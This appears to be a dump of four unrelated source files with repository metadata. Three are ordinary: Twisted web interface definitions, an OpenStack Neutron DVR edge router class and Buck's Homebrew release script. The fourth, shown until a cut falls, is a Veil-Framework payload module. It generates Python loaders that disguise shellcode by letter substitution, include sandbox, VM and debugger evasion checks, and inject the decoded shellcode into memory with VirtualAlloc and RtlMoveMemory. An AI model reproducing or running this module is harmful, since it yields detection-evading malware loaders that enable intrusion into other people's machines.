received_headers = Attribute(
"Backwards-compatibility access to C{requestHeaders}, deprecated in "
"Twisted 13.2.0. Use C{requestHeaders} instead. C{received_headers} "
"behaves mostly like a C{dict} and does not provide access to all "
"header values.")
requestHeaders = Attribute(
"A L{http_headers.Headers} instance giving all received HTTP request "
"headers.")
content = Attribute(
"A file-like object giving the request body. This may be a file on "
"disk, a C{StringIO}, or some other type. The implementation is free "
"to decide on a per-request basis.")
headers = Attribute(
"Backwards-compatibility access to C{responseHeaders}, deprecated in "
"Twisted 13.2.0. Use C{responseHeaders} instead. C{headers} behaves "
"mostly like a C{dict} and does not provide access to all header "
"values nor does it allow multiple values for one header to be set.")
responseHeaders = Attribute(
"A L{http_headers.Headers} instance holding all HTTP response "
"headers to be sent.")
def getHeader(key):
"""
Get an HTTP request header.
@type key: C{str}
@param key: The name of the header to get the value of.
@rtype: C{str} or C{NoneType}
@return: The value of the specified header, or C{None} if that header
was not present in the request.
"""
def getCookie(key):
"""
Get a cookie that was sent from the network.
"""
def getAllHeaders():
"""
Return dictionary mapping the names of all received headers to the last
value received for each.
Since this method does not return all header information,
C{requestHeaders.getAllRawHeaders()} may be preferred.
"""
def getRequestHostname():
"""
Get the hostname that the user passed in to the request.
This will either use the Host: header (if it is available) or the
host we are listening on if the header is unavailable.
@returns: the requested hostname
@rtype: C{str}
"""
def getHost():
"""
Get my originally requesting transport's host.
@return: An L{IAddress<twisted.internet.interfaces.IAddress>}.
"""
def getClientIP():
"""
Return the IP address of the client who submitted this request.
@returns: the client IP address or C{None} if the request was submitted
over a transport where IP addresses do not make sense.
@rtype: L{str} or C{NoneType}
"""
def getClient():
"""
Return the hostname of the IP address of the client who submitted this
request, if possible.
This method is B{deprecated}. See L{getClientIP} instead.
@rtype: C{NoneType} or L{str}
@return: The canonical hostname of the client, as determined by
performing a name lookup on the IP address of the client.
"""
def getUser():
"""
Return the HTTP user sent with this request, if any.
If no user was supplied, return the empty string.
@returns: the HTTP user, if any
@rtype: C{str}
"""
def getPassword():
"""
Return the HTTP password sent with this request, if any.
If no password was supplied, return the empty string.
@returns: the HTTP password, if any
@rtype: C{str}
"""
def isSecure():
"""
Return True if this request is using a secure transport.
Normally this method returns True if this request's HTTPChannel
instance is using a transport that implements ISSLTransport.
This will also return True if setHost() has been called
with ssl=True.
@returns: True if this request is secure
@rtype: C{bool}
"""
def getSession(sessionInterface=None):
"""
Look up the session associated with this request or create a new one if
there is not one.
@return: The L{Session} instance identified by the session cookie in
the request, or the C{sessionInterface} component of that session
if C{sessionInterface} is specified.
"""
def URLPath():
"""
@return: A L{URLPath} instance which identifies the URL for which this
request is.
"""
def prePathURL():
"""
@return: At any time during resource traversal, a L{str} giving an
absolute URL to the most nested resource which has yet been
reached.
"""
def rememberRootURL():
"""
Remember the currently-processed part of the URL for later
recalling.
"""
def getRootURL():
"""
Get a previously-remembered URL.
"""
# Methods for outgoing response
def finish():
"""
Indicate that the response to this request is complete.
"""
def write(data):
"""
Write some data to the body of the response to this request. Response
headers are written the first time this method is called, after which
new response headers may not be added.
"""
def addCookie(k, v, expires=None, domain=None, path=None, max_age=None, comment=None, secure=None):
"""
Set an outgoing HTTP cookie.
In general, you should consider using sessions instead of cookies, see
L{twisted.web.server.Request.getSession} and the
L{twisted.web.server.Session} class for details.
"""
def setResponseCode(code, message=None):
"""
Set the HTTP response code.
"""
def setHeader(k, v):
"""
Set an HTTP response header. Overrides any previously set values for
this header.
@type name: C{str}
@param name: The name of the header for which to set the value.
@type value: C{str}
@param value: The value to set for the named header.
"""
def redirect(url):
"""
Utility function that does a redirect.
The request should have finish() called after this.
"""
def setLastModified(when):
"""
Set the C{Last-Modified} time for the response to this request.
If I am called more than once, I ignore attempts to set Last-Modified
earlier, only replacing the Last-Modified time if it is to a later
value.
If I am a conditional request, I may modify my response code to
L{NOT_MODIFIED<http.NOT_MODIFIED>} if appropriate for the time given.
@param when: The last time the resource being returned was modified, in
seconds since the epoch.
@type when: L{int}, L{long} or L{float}
@return: If I am a C{If-Modified-Since} conditional request and the time
given is not newer than the condition, I return
L{CACHED<http.CACHED>} to indicate that you should write no body.
Otherwise, I return a false value.
"""
def setETag(etag):
"""
Set an C{entity tag} for the outgoing response.
That's "entity tag" as in the HTTP/1.1 I{ETag} header, "used for
comparing two or more entities from the same requested resource."
If I am a conditional request, I may modify my response code to
L{NOT_MODIFIED<http.NOT_MODIFIED>} or
L{PRECONDITION_FAILED<http.PRECONDITION_FAILED>}, if appropriate for the
tag given.
@param etag: The entity tag for the resource being returned.
@type etag: C{str}
@return: If I am a C{If-None-Match} conditional request and the tag
matches one in the request, I return L{CACHED<http.CACHED>} to
indicate that you should write no body. Otherwise, I return a
false value.
"""
def setHost(host, port, ssl=0):
"""
Change the host and port the request thinks it's using.
This method is useful for working with reverse HTTP proxies (e.g. both
Squid and Apache's mod_proxy can do this), when the address the HTTP
client is using is different than the one we're listening on.
For example, Apache may be listening on https://www.example.com, and
then forwarding requests to http://localhost:8080, but we don't want
HTML produced by Twisted to say 'http://localhost:8080', they should
say 'https://www.example.com', so we do::
request.setHost('www.example.com', 443, ssl=1)
"""
class IAccessLogFormatter(Interface):
"""
An object which can represent an HTTP request as a line of text for
inclusion in an access log file.
"""
def __call__(timestamp, request):
"""
Generate a line for the access log.
@param timestamp: The time at which the request was completed in the
standard format for access logs.
@type timestamp: L{unicode}
@param request: The request object about which to log.
@type request: L{twisted.web.server.Request}
@return: One line describing the request without a trailing newline.
@rtype: L{unicode}
"""
class ICredentialFactory(Interface):
"""
A credential factory defines a way to generate a particular kind of
authentication challenge and a way to interpret the responses to these
challenges. It creates
L{ICredentials<twisted.cred.credentials.ICredentials>} providers from
responses. These objects will be used with L{twisted.cred} to authenticate
    and authorize requests.
"""
scheme = Attribute(
"A C{str} giving the name of the authentication scheme with which "
"this factory is associated. For example, C{'basic'} or C{'digest'}.")
def getChallenge(request):
"""
Generate a new challenge to be sent to a client.
        @type request: L{twisted.web.http.Request}
        @param request: The request whose response will include this
            challenge.
@rtype: C{dict}
@return: A mapping from C{str} challenge fields to associated C{str}
values.
"""
def decode(response, request):
"""
Create a credentials object from the given response.
@type response: C{str}
@param response: scheme specific response string
@type request: L{twisted.web.http.Request}
@param request: The request being processed (from which the response
was taken).
@raise twisted.cred.error.LoginFailed: If the response is invalid.
@rtype: L{twisted.cred.credentials.ICredentials} provider
@return: The credentials represented by the given response.
"""
class IBodyProducer(IPushProducer):
"""
Objects which provide L{IBodyProducer} write bytes to an object which
provides L{IConsumer<twisted.internet.interfaces.IConsumer>} by calling its
C{write} method repeatedly.
L{IBodyProducer} providers may start producing as soon as they have an
L{IConsumer<twisted.internet.interfaces.IConsumer>} provider. That is, they
should not wait for a C{resumeProducing} call to begin writing data.
L{IConsumer.unregisterProducer<twisted.internet.interfaces.IConsumer.unregisterProducer>}
must not be called. Instead, the
L{Deferred<twisted.internet.defer.Deferred>} returned from C{startProducing}
must be fired when all bytes have been written.
L{IConsumer.write<twisted.internet.interfaces.IConsumer.write>} may
synchronously invoke any of C{pauseProducing}, C{resumeProducing}, or
C{stopProducing}. These methods must be implemented with this in mind.
@since: 9.0
"""
# Despite the restrictions above and the additional requirements of
# stopProducing documented below, this interface still needs to be an
# IPushProducer subclass. Providers of it will be passed to IConsumer
# providers which only know about IPushProducer and IPullProducer, not
# about this interface. This interface needs to remain close enough to one
# of those interfaces for consumers to work with it.
length = Attribute(
"""
C{length} is a C{int} indicating how many bytes in total this
L{IBodyProducer} will write to the consumer or L{UNKNOWN_LENGTH}
if this is not known in advance.
""")
def startProducing(consumer):
"""
Start producing to the given
L{IConsumer<twisted.internet.interfaces.IConsumer>} provider.
@return: A L{Deferred<twisted.internet.defer.Deferred>} which fires with
C{None} when all bytes have been produced or with a
L{Failure<twisted.python.failure.Failure>} if there is any problem
before all bytes have been produced.
"""
def stopProducing():
"""
In addition to the standard behavior of
L{IProducer.stopProducing<twisted.internet.interfaces.IProducer.stopProducing>}
(stop producing data), make sure the
L{Deferred<twisted.internet.defer.Deferred>} returned by
C{startProducing} is never fired.
"""
class IRenderable(Interface):
"""
An L{IRenderable} is an object that may be rendered by the
L{twisted.web.template} templating system.
"""
def lookupRenderMethod(name):
"""
Look up and return the render method associated with the given name.
@type name: C{str}
@param name: The value of a render directive encountered in the
document returned by a call to L{IRenderable.render}.
@return: A two-argument callable which will be invoked with the request
being responded to and the tag object on which the render directive
was encountered.
"""
def render(request):
"""
Get the document for this L{IRenderable}.
@type request: L{IRequest} provider or C{NoneType}
@param request: The request in response to which this method is being
invoked.
@return: An object which can be flattened.
"""
class ITemplateLoader(Interface):
"""
A loader for templates; something usable as a value for
L{twisted.web.template.Element}'s C{loader} attribute.
"""
def load():
"""
Load a template suitable for rendering.
@return: a C{list} of C{list}s, C{unicode} objects, C{Element}s and
other L{IRenderable} providers.
"""
class IResponse(Interface):
"""
An object representing an HTTP response received from an HTTP server.
@since: 11.1
"""
version = Attribute(
"A three-tuple describing the protocol and protocol version "
"of the response. The first element is of type C{str}, the second "
"and third are of type C{int}. For example, C{('HTTP', 1, 1)}.")
code = Attribute("The HTTP status code of this response, as a C{int}.")
phrase = Attribute(
"The HTTP reason phrase of this response, as a C{str}.")
headers = Attribute("The HTTP response L{Headers} of this response.")
length = Attribute(
"The C{int} number of bytes expected to be in the body of this "
"response or L{UNKNOWN_LENGTH} if the server did not indicate how "
"many bytes to expect. For I{HEAD} responses, this will be 0; if "
"the response includes a I{Content-Length} header, it will be "
"available in C{headers}.")
request = Attribute(
"The L{IClientRequest} that resulted in this response.")
previousResponse = Attribute(
"The previous L{IResponse} from a redirect, or C{None} if there was no "
"previous response. This can be used to walk the response or request "
"history for redirections.")
def deliverBody(protocol):
"""
Register an L{IProtocol<twisted.internet.interfaces.IProtocol>} provider
to receive the response body.
The protocol will be connected to a transport which provides
L{IPushProducer}. The protocol's C{connectionLost} method will be
called with:
- ResponseDone, which indicates that all bytes from the response
have been successfully delivered.
- PotentialDataLoss, which indicates that it cannot be determined
if the entire response body has been delivered. This only occurs
when making requests to HTTP servers which do not set
I{Content-Length} or a I{Transfer-Encoding} in the response.
- ResponseFailed, which indicates that some bytes from the response
were lost. The C{reasons} attribute of the exception may provide
more specific indications as to why.
"""
def setPreviousResponse(response):
"""
Set the reference to the previous L{IResponse}.
The value of the previous response can be read via
L{IResponse.previousResponse}.
"""
class _IRequestEncoder(Interface):
"""
An object encoding data passed to L{IRequest.write}, for example for
compression purpose.
@since: 12.3
"""
def encode(data):
"""
Encode the data given and return the result.
@param data: The content to encode.
@type data: C{str}
@return: The encoded data.
@rtype: C{str}
"""
def finish():
"""
Callback called when the request is closing.
@return: If necessary, the pending data accumulated from previous
C{encode} calls.
@rtype: C{str}
"""
class _IRequestEncoderFactory(Interface):
"""
    A factory for returning L{_IRequestEncoder} instances.
@since: 12.3
"""
def encoderForRequest(request):
"""
If applicable, returns a L{_IRequestEncoder} instance which will encode
the request.
"""
class IClientRequest(Interface):
"""
An object representing an HTTP request to make to an HTTP server.
@since: 13.1
"""
method = Attribute(
"The HTTP method for this request, as L{bytes}. For example: "
"C{b'GET'}, C{b'HEAD'}, C{b'POST'}, etc.")
absoluteURI = Attribute(
"The absolute URI of the requested resource, as L{bytes}; or C{None} "
"if the absolute URI cannot be determined.")
headers = Attribute(
"Headers to be sent to the server, as "
"a L{twisted.web.http_headers.Headers} instance.")
class IAgent(Interface):
"""
An agent makes HTTP requests.
The way in which requests are issued is left up to each implementation.
Some may issue them directly to the server indicated by the net location
portion of the request URL. Others may use a proxy specified by system
configuration.
Processing of responses is also left very widely specified. An
implementation may perform no special handling of responses, or it may
implement redirect following or content negotiation, it may implement a
cookie store or automatically respond to authentication challenges. It may
implement many other unforeseen behaviors as well.
It is also intended that L{IAgent} implementations be composable. An
implementation which provides cookie handling features should re-use an
implementation that provides connection pooling and this combination could
be used by an implementation which adds content negotiation functionality.
Some implementations will be completely self-contained, such as those which
actually perform the network operations to send and receive requests, but
most or all other implementations should implement a small number of new
features (perhaps one new feature) and delegate the rest of the
request/response machinery to another implementation.
This allows for great flexibility in the behavior an L{IAgent} will
provide. For example, an L{IAgent} with web browser-like behavior could be
obtained by combining a number of (hypothetical) implementations::
baseAgent = Agent(reactor)
redirect = BrowserLikeRedirectAgent(baseAgent, limit=10)
authenticate = AuthenticateAgent(
redirect, [diskStore.credentials, GtkAuthInterface()])
cookie = CookieAgent(authenticate, diskStore.cookie)
decode = ContentDecoderAgent(cookie, [(b"gzip", GzipDecoder())])
cache = CacheAgent(decode, diskStore.cache)
doSomeRequests(cache)
"""
def request(method, uri, headers=None, bodyProducer=None):
"""
Request the resource at the given location.
@param method: The request method to use, such as C{"GET"}, C{"HEAD"},
C{"PUT"}, C{"POST"}, etc.
@type method: L{bytes}
@param uri: The location of the resource to request. This should be an
absolute URI but some implementations may support relative URIs
(with absolute or relative paths). I{HTTP} and I{HTTPS} are the
schemes most likely to be supported but others may be as well.
@type uri: L{bytes}
@param headers: The headers to send with the request (or C{None} to
send no extra headers). An implementation may add its own headers
to this (for example for client identification or content
negotiation).
@type headers: L{Headers} or L{NoneType}
@param bodyProducer: An object which can generate bytes to make up the
body of this request (for example, the properly encoded contents of
a file for a file upload). Or, C{None} if the request is to have
no body.
@type bodyProducer: L{IBodyProducer} provider
@return: A L{Deferred} that fires with an L{IResponse} provider when
the header of the response has been received (regardless of the
response status code) or with a L{Failure} if there is any problem
which prevents that response from being received (including
problems that prevent the request from being sent).
@rtype: L{Deferred}
"""
class IPolicyForHTTPS(Interface):
"""
An L{IPolicyForHTTPS} provides a policy for verifying the certificates of
HTTPS connections, in the form of a L{client connection creator
<twisted.internet.interfaces.IOpenSSLClientConnectionCreator>} per network
location.
@since: 14.0
"""
def creatorForNetloc(hostname, port):
"""
Create a L{client connection creator
<twisted.internet.interfaces.IOpenSSLClientConnectionCreator>}
appropriate for the given URL "netloc"; i.e. hostname and port number
pair.
@param hostname: The name of the requested remote host.
@type hostname: L{bytes}
@param port: The number of the requested remote port.
@type port: L{int}
@return: A client connection creator expressing the security
requirements for the given remote host.
@rtype: L{client connection creator
<twisted.internet.interfaces.IOpenSSLClientConnectionCreator>}
"""
class IAgentEndpointFactory(Interface):
"""
An L{IAgentEndpointFactory} provides a way of constructing an endpoint
used for outgoing Agent requests. This is useful in the case of needing to
proxy outgoing connections, or to otherwise vary the transport used.
@since: 15.0
"""
def endpointForURI(uri):
"""
Construct and return an L{IStreamClientEndpoint} for the outgoing
request's connection.
@param uri: The URI of the request.
@type uri: L{twisted.web.client.URI}
@return: An endpoint which will have its C{connect} method called to
issue the request.
@rtype: an L{IStreamClientEndpoint} provider
@raises twisted.internet.error.SchemeNotSupported: If the given
URI's scheme cannot be handled by this factory.
"""
UNKNOWN_LENGTH = u"twisted.web.iweb.UNKNOWN_LENGTH"
__all__ = [
"IUsernameDigestHash", "ICredentialFactory", "IRequest",
"IBodyProducer", "IRenderable", "IResponse", "_IRequestEncoder",
"_IRequestEncoderFactory", "IClientRequest",
"UNKNOWN_LENGTH"]
| mit |
jacknjzhou/neutron | neutron/agent/l3/dvr_edge_router.py | 7 | 6950 | # Copyright (c) 2015 Openstack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.agent.l3 import dvr_local_router
from neutron.agent.l3 import dvr_snat_ns
from neutron.agent.l3 import router_info as router
from neutron.agent.linux import ip_lib
from neutron.agent.linux import iptables_manager
LOG = logging.getLogger(__name__)
class DvrEdgeRouter(dvr_local_router.DvrLocalRouter):
def __init__(self, agent, host, *args, **kwargs):
super(DvrEdgeRouter, self).__init__(agent, host, *args, **kwargs)
self.snat_namespace = None
self.snat_iptables_manager = None
def external_gateway_added(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_added(
ex_gw_port, interface_name)
if self._is_this_snat_host():
self._create_dvr_gateway(ex_gw_port, interface_name)
def external_gateway_updated(self, ex_gw_port, interface_name):
if not self._is_this_snat_host():
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
return
self._external_gateway_added(ex_gw_port,
interface_name,
self.snat_namespace.name,
preserve_ips=[])
def external_gateway_removed(self, ex_gw_port, interface_name):
super(DvrEdgeRouter, self).external_gateway_removed(ex_gw_port,
interface_name)
if not self._is_this_snat_host():
# no centralized SNAT gateway for this node/agent
LOG.debug("not hosting snat for router: %s", self.router['id'])
return
self.driver.unplug(interface_name,
bridge=self.agent_conf.external_network_bridge,
namespace=self.snat_namespace.name,
prefix=router.EXTERNAL_DEV_PREFIX)
self.snat_namespace.delete()
self.snat_namespace = None
def internal_network_added(self, port):
super(DvrEdgeRouter, self).internal_network_added(port)
        # TODO(gsagie) some of these checks are already implemented
        # in the base class; think about how to avoid re-doing them
if not self._is_this_snat_host():
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
ns_name = dvr_snat_ns.SnatNamespace.get_snat_ns_name(self.router['id'])
interface_name = self.get_snat_int_device_name(sn_port['id'])
self._internal_network_added(
ns_name,
sn_port['network_id'],
sn_port['id'],
sn_port['fixed_ips'],
sn_port['mac_address'],
interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX)
def _dvr_internal_network_removed(self, port):
super(DvrEdgeRouter, self)._dvr_internal_network_removed(port)
if not self.ex_gw_port:
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
is_this_snat_host = ('binding:host_id' in self.ex_gw_port) and (
self.ex_gw_port['binding:host_id'] == self.host)
if not is_this_snat_host:
return
snat_interface = self.get_snat_int_device_name(sn_port['id'])
ns_name = self.snat_namespace.name
prefix = dvr_snat_ns.SNAT_INT_DEV_PREFIX
if ip_lib.device_exists(snat_interface, namespace=ns_name):
self.driver.unplug(snat_interface, namespace=ns_name,
prefix=prefix)
def _create_dvr_gateway(self, ex_gw_port, gw_interface_name):
"""Create SNAT namespace."""
snat_ns = self.create_snat_namespace()
# connect snat_ports to br_int from SNAT namespace
for port in self.get_snat_interfaces():
# create interface_name
interface_name = self.get_snat_int_device_name(port['id'])
self._internal_network_added(
snat_ns.name, port['network_id'],
port['id'], port['fixed_ips'],
port['mac_address'], interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX)
self._external_gateway_added(ex_gw_port, gw_interface_name,
snat_ns.name, preserve_ips=[])
self.snat_iptables_manager = iptables_manager.IptablesManager(
namespace=snat_ns.name,
use_ipv6=self.use_ipv6)
# kicks the FW Agent to add rules for the snat namespace
self.agent.process_router_add(self)
def create_snat_namespace(self):
# TODO(mlavalle): in the near future, this method should contain the
# code in the L3 agent that creates a gateway for a dvr. The first step
# is to move the creation of the snat namespace here
self.snat_namespace = dvr_snat_ns.SnatNamespace(self.router['id'],
self.agent_conf,
self.driver,
self.use_ipv6)
self.snat_namespace.create()
return self.snat_namespace
def get_snat_int_device_name(self, port_id):
long_name = dvr_snat_ns.SNAT_INT_DEV_PREFIX + port_id
return long_name[:self.driver.DEV_NAME_LEN]
def _is_this_snat_host(self):
host = self.router.get('gw_port_host')
if not host:
LOG.debug("gw_port_host missing from router: %s",
self.router['id'])
return host == self.host
def _handle_router_snat_rules(self, ex_gw_port, interface_name):
if not self._is_this_snat_host():
return
if not self.get_ex_gw_port():
return
if not self.snat_iptables_manager:
LOG.debug("DVR router: no snat rules to be handled")
return
with self.snat_iptables_manager.defer_apply():
self._empty_snat_chains(self.snat_iptables_manager)
            # NOTE: unlike the superclass, DVR does not add the jump to the float snat chain.
self._add_snat_rules(ex_gw_port, self.snat_iptables_manager,
interface_name)
| apache-2.0 |
clonetwin26/buck | scripts/updatehomebrew.py | 10 | 5458 | import argparse
import hashlib
import os
import re
import requests # Install with easy_install or pip install
import shutil
import subprocess
import sys
import tempfile
from contextlib import contextmanager
from updatecommon import get_release
from updatecommon import upload_release
TARGET_MACOS_VER = 'yosemite'
TARGET_MACOS_VER_SPEC = TARGET_MACOS_VER + '_or_later'
@contextmanager
def os_closing(o):
yield o
os.close(o)
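# Usage sketch for os_closing (illustrative): it guarantees os.close() on raw
# file descriptors from tempfile.mkstemp, mirroring contextlib.closing for
# objects that expose a .close() method.
#
#     handle, path = tempfile.mkstemp()
#     with os_closing(handle) as handle:
#         os.write(handle, b'data')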
def parse_args(args):
parser = argparse.ArgumentParser(description='Update homebrew-fb')
parser.add_argument(
'version_tag',
help='The name of the tag to create a release for')
parser.add_argument(
'github_token',
type=argparse.FileType(),
help='The authentication token to use to talk to GitHub')
parser.add_argument(
'--tap-repo-location',
default='/usr/local/Homebrew/Library/Taps/facebook/homebrew-fb',
help='The location of the homebrew-fb tap')
return parser.parse_args(args)
def build_bottle(version_tag, tap_repo_location):
print('Building bottle...')
subprocess.check_call(
[
'brew',
'unlink',
'buck',
],
cwd=tap_repo_location)
subprocess.check_call(
[
'brew',
'install',
'--build-bottle',
'buck',
],
cwd=tap_repo_location)
subprocess.check_call(
[
'brew',
'bottle',
'--no-rebuild',
'--skip-relocation',
'buck',
],
cwd=tap_repo_location)
bottle_filename = 'buck-{ver}.{macos_ver}.bottle.tar.gz'.format(
ver=version_tag[1:],
macos_ver=TARGET_MACOS_VER)
subprocess.check_call(
'mv buck-{ver}.*.bottle.tar.gz {bottle_filename}'.format(
ver=version_tag[1:],
bottle_filename=bottle_filename),
shell=True, # for wildcard expansion
cwd=tap_repo_location)
return os.path.join(tap_repo_location, bottle_filename)
def fetch_tarball(url):
print('Fetching tarball from `{}`...'.format(url))
r = requests.get(url, stream=True)
handle, path = tempfile.mkstemp(suffix='.tar.gz')
with os_closing(handle) as handle:
for chunk in r.iter_content(chunk_size=4096):
if chunk:
os.write(handle, chunk)
return path
def validate():
print('Validating bottle...')
subprocess.check_call([
'brew',
'uninstall',
'--force',
'buck',
])
subprocess.check_call([
'brew',
'install',
'buck',
])
def update_bottle(version_tag, github_token, tap_repo_location):
release_data = get_release(version_tag)
tarball_sha256 = sha256(fetch_tarball(release_data['tarball_url']))
# First, update the bottle to have the new version and tarball sha.
temp_handle, temp_path = tempfile.mkstemp(text=True)
with os_closing(temp_handle):
with open(os.path.join(tap_repo_location, 'buck.rb'), 'r') as orig:
for line in orig:
line = re.sub(
r'@@buck_version = .*$',
'@@buck_version = "{}"'.format(version_tag[1:]),
line)
line = re.sub(
r'sha256 "[a-z0-9]{64}"$',
'sha256 "{}"'.format(tarball_sha256),
line)
line = re.sub(
r' url "https://.+"$',
' url "{}"'.format(release_data['tarball_url']),
line)
os.write(temp_handle, line)
shutil.copyfile(temp_path, os.path.join(tap_repo_location, 'buck.rb'))
# Now, build the bottle's binary, and update the file with the new sha.
bottle_file = build_bottle(version_tag, tap_repo_location)
bottle_sha256 = sha256(bottle_file)
upload_release(
bottle_file,
release_data['upload_url'],
github_token,
{'Content-Type': 'application/x-tar'})
os.remove(bottle_file)
temp_handle, temp_path = tempfile.mkstemp(text=True)
with os_closing(temp_handle):
with open(os.path.join(tap_repo_location, 'buck.rb'), 'r') as orig:
for line in orig:
line = re.sub(
r'sha256 "[a-z0-9]{64}" => :.+$',
'sha256 "{sha}" => :{macos_version_spec}'.format(
sha=bottle_sha256,
macos_version_spec=TARGET_MACOS_VER_SPEC),
line)
os.write(temp_handle, line)
shutil.copyfile(temp_path, os.path.join(tap_repo_location, 'buck.rb'))
validate()
subprocess.check_call(
[
'git',
'commit',
'-m',
'Update `buck.rb` to {}'.format(version_tag),
'buck.rb',
],
cwd=tap_repo_location)
print('Your commit is ready for testing! Check it out:')
print(tap_repo_location)
def sha256(file_name):
    # Read in binary mode so the digest matches the bytes on disk.
    with open(file_name, 'rb') as fd:
        return hashlib.sha256(fd.read()).hexdigest()
if __name__ == '__main__':
args = parse_args(sys.argv[1:])
github_token_lines = args.github_token.readlines()
assert len(github_token_lines) == 1, (
'Invalid number of lines in github_token file')
update_bottle(
args.version_tag,
github_token_lines[0].strip(),
args.tap_repo_location)
| apache-2.0 |
Veil-Framework/Veil | tools/evasion/payloads/python/shellcode_inject/letter_substitution.py | 1 | 9106 | """
Currently, this code takes normal shellcode, and replaces the a hex character
with a random non hex letter. At runtime,
the executables reverses the letter substitution and executes the shellcode
Letter substitution code was adapted from:
http://www.tutorialspoint.com/python/string_maketrans.htm
Module built by @christruncer
Contributed to by @EdvardHolst
"""
import random
import string
from datetime import date
from datetime import timedelta
from tools.evasion.evasion_common import encryption
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import gamemaker
from tools.evasion.evasion_common import shellcode_help
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
self.language = "python"
self.rating = "Excellent"
self.extension = "py"
self.hex_letters = "abcdefx"
self.non_hex_letters = "ghijklmnopqrstuvwyz"
self.name = "Python Letter Substitution"
self.path = "python/shellcode_inject/letter_substitution"
self.shellcode = shellcode_help.Shellcode(cli_obj)
self.cli_opts = cli_obj
self.payload_source_code = ""
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
self.cli_shellcode = False
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, or Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"],
"HOSTNAME" : ["X", "Optional: Required system hostname"],
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"CLICKTRACK" : ["X", "Optional: Minimum number of clicks to execute payload"],
"UTCCHECK" : ["FALSE", "Optional: Validates system does not use UTC timezone"],
"VIRTUALFILES" : ["FALSE", "Optional: Check if VM supporting files exist"],
"VIRTUALDLLS" : ["FALSE", "Check for dlls loaded in memory"],
"CURSORMOVEMENT" : ["FALSE", "Check if cursor is in same position after 30 seconds"],
"USERPROMPT" : ["FALSE", "Make user click prompt prior to execution"],
"MINRAM" : ["FALSE", "Check for at least 3 gigs of RAM"],
"SANDBOXPROCESS" : ["FALSE", "Check for common sandbox processes"],
"DETECTDEBUG" : ["FALSE", "Check if debugger is present"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace('\\\\', '\\') +'\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ subbed_shellcode_variable_name +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
